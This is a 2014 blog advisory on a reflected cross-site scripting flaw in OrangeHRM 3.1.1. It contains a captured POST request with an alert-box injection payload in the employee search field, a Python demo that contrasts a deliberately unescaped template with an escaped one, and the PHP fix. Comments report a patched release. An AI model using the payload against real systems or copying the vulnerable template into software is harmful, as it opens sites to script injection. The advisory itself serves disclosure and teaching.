Friday, 28 February 2014

[EN] XSS in OrangeHRM

# ==============================================================
# Title ...| XSS vulnerability in OrangeHRM
# Version .| OrangeHRM 3.1.1
# Date ....| 28.02.2014
# Found ...| HauntIT Blog
# Home ....| http://www.orangehrm.com
# ==============================================================

[+] from an admin user (authenticated session):

# ==============================================================
# XSS

---<request>---
POST /k/cms/orange/orangehrm-3.1.1/symfony/web/index.php/pim/viewEmployeeList HTTP/1.1
Host: 10.149.14.62
(...)
Content-Length: 418

empsearch%5Bemployee_name%5D%5BempName%5D=asdasd&empsearch%5Bemployee_name%5D%5BempId%5D='%3e"%3e%3cbody%2fonload%3dalert(9999)%3e&empsearch%5Bid%5D=&empsearch%5Bemployee_status%5D=0&empsearch%5Btermination%5D=1&empsearch%5Bsupervisor_name%5D=asdasd&empsearch%5Bjob_title%5D=0&empsearch%5Bsub_unit%5D=0&empsearch%5BisSubmitted%5D=yes&empsearch%5B_csrf_token%5D=109e14ec2ad65dc3a8eaa4bf8c28582a&pageNo=&hdnAction=search
---<request>---
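The request above reflects the `empsearch[employee_name][empId]` search term into the response without encoding it for the HTML context it lands in. The following is an added example (not code from the advisory and not OrangeHRM's own template code; OrangeHRM is PHP, Python is used here only because it runs stand-alone): it percent-decodes the captured body exactly as the server would, renders the term into a hypothetical search-field template both unencoded and with attribute-context output encoding, and uses the standard-library HTML parser to show which version lets the submitted value create a new element.

```python
import html
from html.parser import HTMLParser
from urllib.parse import parse_qs

# The POST body from the request in the advisory above, copied verbatim.
CAPTURED_BODY = (
    "empsearch%5Bemployee_name%5D%5BempName%5D=asdasd"
    "&empsearch%5Bemployee_name%5D%5BempId%5D='%3e\"%3e%3cbody%2fonload%3dalert(9999)%3e"
    "&empsearch%5Bid%5D=&empsearch%5Bemployee_status%5D=0&empsearch%5Btermination%5D=1"
    "&empsearch%5Bsupervisor_name%5D=asdasd&empsearch%5Bjob_title%5D=0&empsearch%5Bsub_unit%5D=0"
    "&empsearch%5BisSubmitted%5D=yes&empsearch%5B_csrf_token%5D=109e14ec2ad65dc3a8eaa4bf8c28582a"
    "&pageNo=&hdnAction=search"
)

# Form field name as it appears after percent-decoding the body.
EMP_ID_FIELD = "empsearch[employee_name][empId]"


def emp_id_from_body(body: str) -> str:
    """Percent-decode the form body and return the empId search term as the server sees it."""
    params = parse_qs(body, keep_blank_values=True)
    return params[EMP_ID_FIELD][0]


def render_search_field_vulnerable(emp_id: str) -> str:
    """Hypothetical template that reflects the submitted term straight into an attribute.

    This stands in for the defect class the advisory reports; it is not OrangeHRM's code.
    """
    return f'<input type="text" name="{EMP_ID_FIELD}" value="{emp_id}">'


def render_search_field_fixed(emp_id: str) -> str:
    """Same template with attribute-context output encoding.

    quote=True makes html.escape encode single and double quotes as well as <, > and &,
    so the value can no longer terminate the attribute or the tag.
    """
    return f'<input type="text" name="{EMP_ID_FIELD}" value="{html.escape(emp_id, quote=True)}">'


class _StartTagCollector(HTMLParser):
    """Records every start tag so we can see whether the reflected value created new elements."""

    def __init__(self) -> None:
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)


def start_tags(markup: str) -> list:
    """Return the start tags found in markup, in document order."""
    parser = _StartTagCollector()
    parser.feed(markup)
    parser.close()
    return parser.tags


if __name__ == "__main__":
    term = emp_id_from_body(CAPTURED_BODY)
    print("decoded empId:", term)
    for name, render in (("vulnerable", render_search_field_vulnerable),
                         ("fixed", render_search_field_fixed)):
        markup = render(term)
        print(f"{name}: start tags = {start_tags(markup)}")
        print("  " + markup)
```

The unencoded rendering yields two start tags, `input` and a second `body` element carrying an `onload` attribute, which is what the browser executes; the encoded rendering yields only `input`, with the whole term inert inside the attribute value. The PHP equivalent of the fix is `htmlspecialchars($value, ENT_QUOTES, 'UTF-8')` (or a template engine's auto-escaping) applied at output time, in every context the value is reflected into, rather than input filtering alone.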


# ==============================================================
# More @ http://HauntIT.blogspot.com
# Thanks! ;)
# o/

3 comments:

  1. This reported issue is fixed by OrangeHRM, and the latest OrangeHRM open source version is released.

    OrangeHRM 3.1.2 has been released to SourceForge with security related fixes.
    Released on May 20, 2014.

    Download URL of zip archive: http://sourceforge.net/projects/orangehrm/files/stable/3.1.2/orangehrm-3.1.2.zip/download
  2. This issue has been fixed in OrangeHRM 3.1.2 & released to SourceForge as an active stable release on May 28, 2014.

    Download URL of zip archive: http://sourceforge.net/projects/orangehrm/files/stable/3.1.2/orangehrm-3.1.2.zip/download
  3. Kavitha: big thanks for the update ;)

    iyomi: thank you too ;)

    If you will have any questions, feel free to contact me.

    o/
